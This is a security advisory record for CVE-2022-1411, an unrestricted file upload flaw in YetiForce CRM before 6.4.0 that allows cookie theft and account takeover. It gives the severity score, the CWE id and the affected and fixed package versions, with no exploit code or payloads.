GHSA-pqr6-3j58-9w58

Source

https://github.com/advisories/GHSA-pqr6-3j58-9w58

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pqr6-3j58-9w58/GHSA-pqr6-3j58-9w58.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-pqr6-3j58-9w58

Aliases

CVE-2022-1411

Published

2022-05-06T00:00:48Z

Modified

2023-11-08T04:07:48.069962Z

Severity

6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVSS Calculator

Summary

Unrestricted Upload of File with Dangerous Type in yetiforce-crm

Details

Unrestructed file upload in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0. Attacker can send malicious files to the victims is able to retrieve the stored data from the web application without that data being made safe to render in the browser and steals victim's cookie leads to account takeover.

Database specific

{
    "nvd_published_at": "2022-05-05T11:15:00Z",
    "github_reviewed_at": "2022-05-24T22:23:32Z",
    "severity": "MODERATE",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-434"
    ]
}

References

Affected packages

Packagist / yetiforce/yetiforce-crm

Package

Name: yetiforce/yetiforce-crm
Purl: pkg:composer/yetiforce/yetiforce-crm

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

6.4.0

Affected versions

4.*

4.0.0

4.1.0

4.2.0

4.3.0

4.4.0_RC1

4.4.0_RC2

4.4.0_RC3

4.4.0

5.*

5.0.0

5.1.0

5.2.0

5.3.0

6.*

6.0.0a

6.0.0

6.1.0

6.2.0

6.3.0